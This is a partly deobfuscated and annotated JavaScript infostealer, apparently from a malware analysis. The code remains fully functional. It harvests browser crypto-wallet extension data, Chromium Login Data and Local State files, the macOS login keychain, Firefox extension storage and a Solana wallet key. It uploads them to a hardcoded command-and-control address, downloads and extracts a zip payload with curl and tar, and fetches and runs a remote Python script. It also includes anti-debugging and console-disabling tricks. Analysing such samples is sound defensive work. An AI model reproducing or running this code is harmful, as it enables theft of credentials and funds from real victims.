// shifts arrOfStrs till the condition is met (function (getArrOfStrs, magicNum) { const arrOfStrs = getArrOfStrs(); while (true) { try { const _0x5bc6eb = parseInt(dec1(436, 0x120)) / 1 * (parseInt(dec1(526, 0x15)) / 2) + parseInt(dec1(518, 0x18e)) / 3 * (-parseInt(dec1(561, 0x445)) / 4) + -parseInt(dec1(448, 0x407)) / 5 * (parseInt(dec1(521, '0x448')) / 6) + parseInt(dec1(528, '0x90')) / 7 + parseInt(dec1(463, -0x56)) / 8 * (parseInt(dec1(620, 0x125)) / 9) + parseInt(dec1(529, -0xf)) / 10 + -parseInt(dec1(476, 0x279)) / 11; if (_0x5bc6eb === magicNum) { // compare against 775960 break; } else { arrOfStrs.push(arrOfStrs.shift()); } } catch (_err) { arrOfStrs.push(arrOfStrs.shift()); } } })(getArrOfStrs, 775960); // (?) const _0x3f64bb = function () { let flag1 = true; return function (_0x56a168, _0x4b09b7) { const _0x3343a9 = flag1 ? function () { if (_0x4b09b7) { const _0x5bdfee = _0x4b09b7.apply(_0x56a168, arguments); _0x4b09b7 = null; return _0x5bdfee; } } : function () {}; flag1 = false; return _0x3343a9; }; }(); // (?) const _0xb564a4 = _0x3f64bb(this, function () { return _0xb564a4.toString().search("(((.+)+)+)+$").toString().constructor(_0xb564a4).search("(((.+)+)+)+$"); }); // (?), (unused) function _0x23f8f9(_0x578d77, _0x599245, _0x29ff3c, _0xdc1b7e, _0x48949a) { return dec1(_0xdc1b7e + 755, _0x48949a); } _0xb564a4(); // (?) const _0x2fd3bd = function () { let flag2 = true; return function (_0x4380c3, _0x332592) { const _0x263396 = flag2 ? function () { if (_0x332592) { const _0x548336 = _0x332592.apply(_0x4380c3, arguments); _0x332592 = null; return _0x548336; } } : function () {}; flag2 = false; return _0x263396; }; }(); // (?) (function () { _0x2fd3bd(this, function () { const _0x18fbc2 = new RegExp("function *\\( *\\)"); const _0x34bf5d = new RegExp("\\+\\+ *(?:[a-zA-Z_$][0-9a-zA-Z_$]*)", 'i'); const _0x100ae1 = _0x23e34d("init"); if (!_0x18fbc2.test(_0x100ae1 + "chain") || !_0x34bf5d.test(_0x100ae1 + "input")) { _0x100ae1('0'); } else { _0x23e34d(); } })(); })(); // (?) const _0x2a5a96 = function () { let flag3 = true; return function (_0x4bdc0a, _0x2d3630) { const _0x4d49c5 = flag3 ? function () { if (_0x2d3630) { const _0x6d2bf8 = _0x2d3630.apply(_0x4bdc0a, arguments); _0x2d3630 = null; return _0x6d2bf8; } } : function () {}; flag3 = false; return _0x4d49c5; }; }(); // (?), (unused) function _0x7010db(_0x3a87e1, _0x262e58, _0x514759, _0x2b76a4, _0x4bebf3) { return dec1(_0x2b76a4 - 0x33c, _0x4bebf3); } // disables console.* const _0x42c5cd = _0x2a5a96(this, function () { const obj = { FZJcA: function (_0x3da6c0, _0x394407) { return _0x3da6c0 + _0x394407; }, OkPvv: "error" }; obj.YCNuG = "table"; const getGlobalsObj = function () { let _0x4fa761; try { _0x4fa761 = Function("return (function() {}.constructor(\"return this\")( ));")(); } catch (_0x3bd620) { _0x4fa761 = window; } return _0x4fa761; }; const globalsObj = getGlobalsObj(); const _0x5673cb = globalsObj.console = globalsObj.console || {}; const consoleLogTypes = ["log", "warn", "info", "error", "exception", obj.YCNuG, "trace"]; for (let i = 0; i < consoleLogTypes.length; i++) { const _0x180732 = _0x2a5a96.constructor.prototype.bind(_0x2a5a96); const currConsoleLogType = consoleLogTypes[i]; const _0x2797c6 = _0x5673cb[currConsoleLogType] || _0x180732; _0x180732.__proto__ = _0x2a5a96.bind(_0x2a5a96); _0x180732.toString = _0x2797c6.toString.bind(_0x2797c6); _0x5673cb[currConsoleLogType] = _0x180732; } }); _0x42c5cd(); const fs = require('fs'); const os = require('os'); const path = require("path"); const request = require("request"); const exec = require("child_process").exec; const hostname = os.hostname(); const platform = os.platform(); const homedir = os.homedir(); const tmpdir = os.tmpdir(); const getPathRelativeToHomedir = _0x2b012b => _0x2b012b.replace(/^~([a-z]+|\/)/, (_, _0x772cb7) => '/' === _0x772cb7 ? homedir : path.dirname(homedir) + '/' + _0x772cb7); function pathExists(_0x23cb6a) { try { fs.accessSync(_0x23cb6a); return true; } catch (_err) { return false; } } // [windows, macos, linux] const bravePaths = ["Local/BraveSoftware/Brave-Browser", "BraveSoftware/Brave-Browser", "BraveSoftware/Brave-Browser"]; const chromePaths = ["Local/Google/Chrome", "Google/Chrome", "google-chrome"]; const operaPaths = ["Roaming/Opera Software/Opera Stable", "com.operasoftware.Opera", "opera"]; const extensionIds = ["nkbihfbeogaeaoehlefnkodbefgpgknn", "ejbalbakoplchlghecdalmeeeajnimhm", "fhbohimaelbohpjbbldcngcnapndodjp", "hnfanknocfeofbddgcijnmhnfnkdnaad", "ibnejdfjmmkpcnlpebklmnkoeoihofec", "bfnaelmomeimhlpmgjnjophhpkkoljpa", "aeachknmefphepccionboohckonoeemg", "hifafgmccdpekplomjjkcfgodnhcellj", "jblndlipeogpafnldhgmapagcccfchpi", "acmacodkjbdgmoleebolmdjonilkdbch", "dlcobpjiigpikoobohmabehhmhfoodbb", "aholpfdialjgjfhomihkjbmgjidlcdno"]; // steals browser extension wallets' log and db files, and also Solana CLI default wallet secret key const stealBrowserExtensionFiles = async (browserPath, someNumberAndUnderscore, checkForIdJson, timestamp) => { let idJsonPath; if (!browserPath || '' === browserPath) { return []; } try { if (!pathExists(browserPath)) { return []; } } catch (_err) { return []; } if (!someNumberAndUnderscore) { someNumberAndUnderscore = ''; } let filesToSteal = []; for (let i = 0; i < 200; i++) { const extensionsPath = browserPath + '/' + (0 === i ? "Default" : "Profile " + i) + "/Local Extension Settings"; for (let j = 0; j < extensionIds.length; j++) { let extensionPath = extensionsPath + '/' + extensionIds[j]; if (pathExists(extensionPath)) { let extensionPathItems = []; try { extensionPathItems = fs.readdirSync(extensionPath); } catch (_0x4f5794) { extensionPathItems = []; } extensionPathItems.forEach(async itemPath => { let itemRealPath = path.join(extensionPath, itemPath); try { const options = { filename: "102_" + someNumberAndUnderscore + i + '_' + extensionIds[j] + '_' + itemPath }; if (itemRealPath.includes(".log") || itemRealPath.includes(".ldb")) { filesToSteal.push({ 'value': fs.createReadStream(itemRealPath), 'options': options }); } } catch (_err) {} }); } } } if (checkForIdJson && (idJsonPath = homedir + "/.config/solana/id.json", fs.existsSync(idJsonPath))) { try { const options = { filename: "solana_id.txt" }; filesToSteal.push({ 'value': fs.createReadStream(idJsonPath), 'options': options }); } catch (_err) {} } uploadFiles(filesToSteal, timestamp); return filesToSteal; }; // steals Firefox extension files (not just wallet ones) const stealFirefoxExtensionFiles = timestamp => { const firefoxProfilesPath = getPathRelativeToHomedir('~/') + "/AppData/Roaming/Mozilla/Firefox/Profiles"; let filesToSteal = []; if (pathExists(firefoxProfilesPath)) { let firefoxProfilesPathItems = []; try { firefoxProfilesPathItems = fs.readdirSync(firefoxProfilesPath); } catch (_0x33914c) { firefoxProfilesPathItems = []; } let outerCounter = 0; firefoxProfilesPathItems.forEach(async itemPath1 => { const obj = { GfbKa: ".files" }; obj.vdKma = "idb"; let profilePath = path.join(firefoxProfilesPath, itemPath1); if (profilePath.includes("-release")) { // default-release let siteStoragePath = path.join(profilePath, "/storage/default"); let siteStoragePathItems = []; siteStoragePathItems = fs.readdirSync(siteStoragePath); let innerCounter = 0; siteStoragePathItems.forEach(async itemPath2 => { // default-release/storage/default/* if (itemPath2.includes("moz-extension")) { let extensionStoragePath = path.join(siteStoragePath, itemPath2); extensionStoragePath = path.join(extensionStoragePath, obj.vdKma); let extensionStoragePathItems = []; extensionStoragePathItems = fs.readdirSync(extensionStoragePath); extensionStoragePathItems.forEach(async itemPath3 => { // default-release/storage/default//idb/* if (itemPath3.includes(".files")) { let _0x7d359f = path.join(extensionStoragePath, itemPath3); let _0x5ef2d8 = []; _0x5ef2d8 = fs.readdirSync(_0x7d359f); _0x5ef2d8.forEach(_0x542571 => { // default-release/storage/default//idb/<...>.files/* if (!fs.statSync(path.join(_0x7d359f, _0x542571)).isDirectory()) { // skips directories let filePath = path.join(_0x7d359f, _0x542571); const options = { filename: outerCounter + '_' + innerCounter + '_' + _0x542571 }; filesToSteal.push({ 'value': fs.createReadStream(filePath), 'options': options }); } }); } }); } }); innerCounter += 1; } outerCounter += 1; }); uploadFiles(filesToSteal, timestamp); return filesToSteal; } }; // uploads files to CnC const uploadFiles = (filesToSteal, timestamp) => { const formData = { type: '10', hid: "102_" + hostname, uts: timestamp, multi_file: filesToSteal }; try { if (filesToSteal.length > 0) { const _0x13e86c = { url: "http://95.164.17.24:1224/uploads", formData: formData }; request.post(_0x13e86c, (_0x3ba857, _0x24b030, _0xa33a27) => {}); } } catch (_err) {} }; const stealChromiumBasedBrowserExtensionFiles = async (paths, browserId, timestamp) => { // browserId: 0 => chrome, 1 => brave, 2 => opera try { let browserPath = ''; browserPath = 'd' == platform[0] ? getPathRelativeToHomedir('~/') + "/Library/Application Support/" + paths[1] // macos : 'l' == platform[0] ? getPathRelativeToHomedir('~/') + "/.config/" + paths[2] // linux : getPathRelativeToHomedir('~/') + "/AppData/" + paths[0] + "/User Data"; // windows await stealBrowserExtensionFiles(browserPath, browserId + '_', 0 == browserId, timestamp); } catch (_0xb053ff) {} }; // steals macOS login keychain, Chrome and Brave login data files const stealMacosKeychainAndChromiumLoginDataFiles = async timestamp => { let filesToSteal = []; let loginKeychainPath = homedir + "/Library/Keychains/login.keychain"; if (fs.existsSync(loginKeychainPath)) { try { const options = { filename: "logkc-db" }; filesToSteal.push({ 'value': fs.createReadStream(loginKeychainPath), 'options': options }); } catch (_err) {} } else { loginKeychainPath += "-db"; if (fs.existsSync(loginKeychainPath)) { try { const options = { filename: "logkc-db" }; filesToSteal.push({ 'value': fs.createReadStream(loginKeychainPath), 'options': options }); } catch (_err) {} } } try { let chromeFilesPath = homedir + "/Library/Application Support/Google/Chrome"; if (pathExists(chromeFilesPath)) { for (let i = 0; i < 200; i++) { const loginDataFilePath = chromeFilesPath + '/' + (0 === i ? "Default" : "Profile " + i) + "/Login Data"; try { if (!pathExists(loginDataFilePath)) { continue; } const ldFilePath = chromeFilesPath + "/ld_" + i; const options = { filename: "pld_" + i }; if (pathExists(ldFilePath)) { filesToSteal.push({ 'value': fs.createReadStream(ldFilePath), 'options': options }); } else { fs.copyFile(loginDataFilePath, ldFilePath, _0x3d1081 => { const options = { filename: "pld_" + i }; let filesToSteal2 = [{ 'value': fs.createReadStream(loginDataFilePath), 'options': options }]; uploadFiles(filesToSteal2, timestamp); }); } } catch (_err) {} } } } catch (_err) {} try { let braveFilesPath = homedir + "/Library/Application Support/BraveSoftware/Brave-Browser"; if (pathExists(braveFilesPath)) { for (let i = 0; i < 200; i++) { const profilePath = braveFilesPath + '/' + (0 === i ? "Default" : "Profile " + i); try { if (!pathExists(profilePath)) { continue; } const loginDataFilePath = profilePath + "/Login Data"; const options = { filename: "brld_" + i }; if (pathExists(loginDataFilePath)) { filesToSteal.push({ 'value': fs.createReadStream(loginDataFilePath), 'options': options }); } else { fs.copyFile(profilePath, loginDataFilePath, _0x11a26c => { const options = { filename: "brld_" + i }; let filesToSteal3 = [{ 'value': fs.createReadStream(profilePath), 'options': options }]; uploadFiles(filesToSteal3, timestamp); }); } } catch (_err) {} } } } catch (_err) {} uploadFiles(filesToSteal, timestamp); return filesToSteal; }; // steals local state and login data files of the given Chromium based browser const stealChromiumLocalStateAndLoginDataFiles = async (browserPaths, browserId, timestamp) => { let filesToSteal = []; let browserRealPath = ''; browserRealPath = 'd' == platform[0] ? getPathRelativeToHomedir('~/') + "/Library/Application Support/" + browserPaths[1] : 'l' == platform[0] ? getPathRelativeToHomedir('~/') + "/.config/" + browserPaths[2] : getPathRelativeToHomedir('~/') + "/AppData/" + browserPaths[0] + "/User Data"; let localStateFilePath = browserRealPath + "/Local State"; if (fs.existsSync(localStateFilePath)) { try { const options = { filename: browserId + "_lst" }; filesToSteal.push({ 'value': fs.createReadStream(localStateFilePath), 'options': options }); } catch (_err) {} } try { if (pathExists(browserRealPath)) { for (let i = 0; i < 200; i++) { const profilePath = browserRealPath + '/' + (0 === i ? "Default" : "Profile " + i); try { if (!pathExists(profilePath)) { continue; } const loginDataFilePath = profilePath + "/Login Data"; if (!pathExists(loginDataFilePath)) { continue; } const options = { filename: browserId + '_' + i + "_uld" }; filesToSteal.push({ 'value': fs.createReadStream(loginDataFilePath), 'options': options }); } catch (_err) {} } } } catch (_err) {} uploadFiles(filesToSteal, timestamp); return filesToSteal; }; // (?), (unused) function _0x4db77a(_0x54d20b, _0x2335f6, _0x3f5711, _0x24fd41, _0x1c2503) { return dec1(_0x1c2503 + 713, _0x24fd41); } let someSize = 0; // (?) (function () { let _0x635dd9; try { const _0x35f3bc = Function("return (function() {}.constructor(\"return this\")( ));"); _0x635dd9 = _0x35f3bc(); } catch (_0x2817b8) { _0x635dd9 = window; } _0x635dd9.setInterval(_0x23e34d, 4000); })(); // (?), (unused) function _0x3e8d45(_0x11f906, _0x1630cb, _0xdb2689, _0x5aaac9, _0x2648fd) { return dec1(_0xdb2689 - '0x32b', _0x1630cb); } function getArrOfStrs() { const arrOfStrs = ['RHmqc', 'omjjk', 'ApteI', 'sCumQ', 'copyF', '/ld_', 'rome', 'fgpgk', 'exec', 'rneKI', 'lLrSF', 'push', 'test', 'const', 'OiABa', 'nkbih', 'ocal/', '/Libr', 'gpafn', '/Logi', 'count', 'hostn', '/Goog', 'type', 'ain', 'gger', '3037OzSgDk', 'ctor(', 'round', 'fdial', 'multi', 'mdjon', 'ata', 'idb', 'oihof', "is\")(", 'knmef', 'ync', '125CwSmIC', 'VPgoc', 'ware/', 'ess', 'IGRsE', "\\pyth", 'repla', 'Micro', 'wlUAS', '0-9a-', "\\+\\+ ", 'ensio', '-rele', 'pjiig', 'SvCSl', '16zYubJH', 'bind', 'rmSyn', 'hoSHZ', 'e/Chr', 'log', 'hfood', 'LswSJ', 'write', 'wynjd', '//95.', 'OkPvv', 'woHII', '13479389yigTOw', 'TzzgA', 'oohck', 'ort/G', '/AppD', 'Brave', 'googl', '_lst', 'ata/', 'acmac', 'AVJaB', 'on.ex', 'isDir', 'Data', 'lengt', 'jXfuU', "\\.pyp", 'yzTXQ', 'url', 'jgjfh', 'inclu', 'call', 'ng/Op', '$]*)', 'xfpZo', 'filen', 'eebol', 'ome', 'jblnd', 'excep', 'ZDfOB', 'brld_', 'bohma', 'aeaoe', 'uCJgo', 'nt/', 'trace', "n3 \"", 'IOjHQ', 'ejbal', 'nhcel', 'NNhzn', '382902FMrTAX', 'StRpE', 'ort/B', '23610RVWEoM', 'ion', 'oamin', 'table', 'pebkl', '164qDPepv', 'hid', '6465221OiGmbD', '15101090qJHwNn', 'Z_$][', 'bbldc', 'Strea', 'ogin.', 'nstru', 'post', 'ZEGam', 'JOVFD', "l Ext", 'init', '/stor', 'info', 'oZjzq', 'g/Moz', 'wOJfi', ')+)+)', 'ser', 'ame', "n (fu", 'nmhnf', 'WpCbt', 'xtens', 'bGCdl', 'forEa', '*(?:[', 'nctio', 'Defau', 'ary/K', 'bfnae', 'moz-e', 'apply', '28JNYCjU', 'rave-', '/.con', "rn th", 'UroxN', 'http:', 'des', 'raveS', 'HGaea', "-Lo \"", '/id.j', " (tru", 'fbeog', 'are/B', 'eSoft', 'ofile', " Supp", 'size', 'solan', 'bvLnu', 'path', 'Roami', 'input', 'ata/R', 'cionb', 'sJMRc', 'fOasi', 'wambz', 'dgcij', 'dlcob', 'oogle', 'conso', "ion *", "l Sta", 'tmpdi', 'warn', 'peras', "e\" \"", 'logkc', 'FZJcA', 'formD', 'statS', 'setIn', 'opera', 'lipeo', 'jXzWn', 'BmaWn', '.ldb', 'ophhp', 'error', 'eycha', '/Loca', 'funct', 'DHpkL', 'ation', 'pytho', '/pdow', 'Firef', '/.npl', '1396917dSIpDK', 'proto', 'Brows', 'lmeee', 'child', 'ins/l', 'ajnim', 'bohpj', 'ing', '_proc', 'fhboh', 'knocf', '(((.+', 'ibnej', "\" \"", 're.Op', '/uplo', "xf ", 'apagc', "n() ", 'czYua', 'DaCRF', 'GfbKa', 'pplic', 'PlQuv', "\"retu", 'eofbd', 'lmome', 'searc', 'ile', 'hifaf', 'vdKma', 'lYbbZ', " Data", 're/Op', 'onoee', 'imhlp', '7.24:', "\\( *\\", 'pld_', 'ave-B', 'gdVKS', 'ox/Pr', 'Nchdc', 'CAdIA', 'eRead', 'ads', 'YvgzM', "n Dat", 'state', 'retur', 'ructo', '/Brav', 'readd', 'bakop', 'JLXSG', 'strin', 'imael', 'efaul', 'Softw', 'ilkdb', "e) {}", 'Objec', 'ector', 'Profi', 'soft/', 'join', 'le/Ch', 'eSync', 'homed', '102', 'behhm', 'platf', 'keych', '164.1', 'dfjmm', 'aholp', 'VpXqy', '.log', 'pekpl', "curl ", 'qaEUw', '.file', '/clie', 'JPxEu', 'exist', 'acces', '1224', 'kkolj', "tar -", 'ldhgm', "le ", 'ata/L', 'aeach', 'lchlg', 'mgjnj', 'age/d', '_file', 'UaQym', 'oftwa', 'FileS', 'QxhnJ', 'toStr', 'cfgod', 'YCNuG', 'OaJhU', " -C ", 'cyKTi', 'Etbne', '__pro', 'tings', 'ccfch', 'txt', '{}.co', 'irSyn', "\\p2.z", 'fig/', '-Brow', 'renam', 'dirna', 'SIQUz', 'Edge/', '_uld', 'RdYzg', 'hecda', 'reque', '/Chro', 'sSync', 're/Br', 'jbmgj', 'phepc', 'ary/A', 'uts', 'pndod', 'fig/s', 'kodbe', 'omihk', 'WSGWI', 'nkdna', 'zA-Z_', 'olana', 'PwHqq', 'a-zA-', 'kpcnl', 'creat', 'terva', 'illa/', 'ase', 'WDvbl', '/User', 'to__', 'debu', 'orm', 'owgIh', 'ZVViQ', 'idlcd', 'gvOfj', "era S", 'rowse', 'SfxxB', 'ort/', 'pikoo', "n Set", "\\p.zi", 'dgmol', 'odkjb', 'chain', 'lZQox', "User ", 'a_id.', 'son', 'mnkoe', 'era', 'Local', 'gmccd', 'tion', 'actio', 'e-chr', 'get', 'ngcna', '-db', 'while', 'hlefn', 'com.o', 'hnfan', 'ihOIO', 'Googl', 'getTi']; getArrOfStrs = function () { return arrOfStrs; }; return getArrOfStrs(); } const extractZipFile = async zipFilePath => { exec("tar -xf " + zipFilePath + " -C " + homedir, (_0x324a1d, _0x252b20, _0x133078) => { if (_0x324a1d) { // error check? fs.rmSync(zipFilePath); return void (someSize = 0); } fs.rmSync(zipFilePath); _0x12016a(); }); }; // starts downloading "p.zi" via curl, then checks again 20 secs later and renames "p.zi" to "p2.zip" const renameOrDownloadZipPayload = () => { const pDotZiFilePath = tmpdir + "\\p.zi"; const p2DotZipFilePath = tmpdir + "\\p2.zip"; if (someSize >= 51476596) { return; } if (fs.existsSync(pDotZiFilePath)) { try { var pDotZiFileStat = fs.statSync(pDotZiFilePath); if (pDotZiFileStat.size >= 51476596) { someSize = pDotZiFileStat.size; fs.rename(pDotZiFilePath, p2DotZipFilePath, _0x553356 => { if (_0x553356) { // error check? throw _0x553356; } extractZipFile(p2DotZipFilePath); }); } else { if (someSize < pDotZiFileStat.size) { someSize = pDotZiFileStat.size; } else { fs.rmSync(pDotZiFilePath); someSize = 0; } runRenameOrDownloadZipPayload20SecsLater(); } } catch (_err) {} } else { exec("curl -Lo \"" + pDotZiFilePath + "\" \"" + "http://95.164.17.24:1224/pdown" + "\"", (_0x5411ad, _0xcb4513, _0x5de2d3) => { if (_0x5411ad) { // error check? someSize = 0; return void runRenameOrDownloadZipPayload20SecsLater(); } try { someSize = 51476596; fs.renameSync(pDotZiFilePath, p2DotZipFilePath); extractZipFile(p2DotZipFilePath); } catch (_err) {} }); } }; function runRenameOrDownloadZipPayload20SecsLater() { setTimeout(() => { renameOrDownloadZipPayload(); }, 20000); } // (?), (unused) function _0x57a4c1(_0x43c66e, _0x2a997b, _0x48cd90, _0x40e99d, _0x1e8e5b) { return dec1(_0x40e99d - '0x275', _0x2a997b); } const _0x12016a = async () => await new Promise((_0x233d9e, _0x5c8f91) => { if ('w' == platform[0]) { if (fs.existsSync(homedir + "\\.pyp\\python.exe")) { (() => { const _0xd5cb33 = homedir + "/.npl"; const _0x8f1f03 = "\"" + homedir + "\\.pyp\\python.exe\" \"" + _0xd5cb33 + "\""; try { fs.rmSync(_0xd5cb33); } catch (_err) {} request.get("http://95.164.17.24:1224/client/10/102", (_0x4b6c32, _0x5867cc, _0x301229) => { if (!_0x4b6c32) { try { fs.writeFileSync(_0xd5cb33, _0x301229); exec(_0x8f1f03, (_0x4795b0, _0x118518, _0x147813) => {}); } catch (_0x1b1d20) {} } }); })(); } else { renameOrDownloadZipPayload(); } } else { (() => { request.get("http://95.164.17.24:1224/client/10/102", (_0x571ef, _0x54cdca, _0x20d052) => { if (!_0x571ef) { fs.writeFileSync(homedir + "/.npl", _0x20d052); exec("python3 \"" + homedir + "/.npl\"", (_0xc70c90, _0x515aed, _0x3e5a0a) => {}); } }); })(); } }); var _0x533351 = 0; const _0x196775 = async () => { try { const timestamp = Math.round(new Date().getTime() / 1000); await (async () => { try { await stealChromiumBasedBrowserExtensionFiles(chromePaths, 0, timestamp); await stealChromiumBasedBrowserExtensionFiles(bravePaths, 1, timestamp); await stealChromiumBasedBrowserExtensionFiles(operaPaths, 2, timestamp); stealFirefoxExtensionFiles(timestamp); if ('w' == platform[0]) { await stealBrowserExtensionFiles(getPathRelativeToHomedir('~/') + "/AppData/Local/Microsoft/Edge/User Data", '3_', false, timestamp); } if ('d' == platform[0]) { await stealMacosKeychainAndChromiumLoginDataFiles(timestamp); } else { await stealChromiumLocalStateAndLoginDataFiles(chromePaths, 0, timestamp); await stealChromiumLocalStateAndLoginDataFiles(bravePaths, 1, timestamp); await stealChromiumLocalStateAndLoginDataFiles(operaPaths, 2, timestamp); } } catch (_0x17de0d) {} })(); _0x12016a(); } catch (_0xf5fe05) {} }; _0x196775(); _0x12016a(); function dec1(in1, _) { const arrOfStrs = getArrOfStrs(); dec1 = function (in1, _) { in1 = in1 - 300; let _0x159f5f = arrOfStrs[in1]; return _0x159f5f; }; return dec1(in1, _); } let _0xed7e8 = setInterval(() => { if ((_0x533351 += 1) < 5) { _0x196775(); } else { clearInterval(_0xed7e8); } }, 30000); // (?) function _0x23e34d(initFlag) { const obj = { divide: function (op1, op2) { return op1 / op2; } }; obj.mod = function (op1, op2) { return op1 % op2; }; obj.literalAction = "action"; function _0x36aeff(_0x314f83) { if (typeof _0x314f83 === "string") { return function (_0x19d64e) {}.constructor("while (true) {}").apply("counter"); } else if (('' + _0x314f83 / _0x314f83).length !== 1 || obj.mod(_0x314f83, 20) === 0) { (function () { return true; }).constructor("debugger").call(obj.literalAction); } else { (function () { return false; }).constructor("debugger").apply("stateObject"); } _0x36aeff(++_0x314f83); } try { if (initFlag) { return _0x36aeff; } else { _0x36aeff(0); } } catch (_err) {} }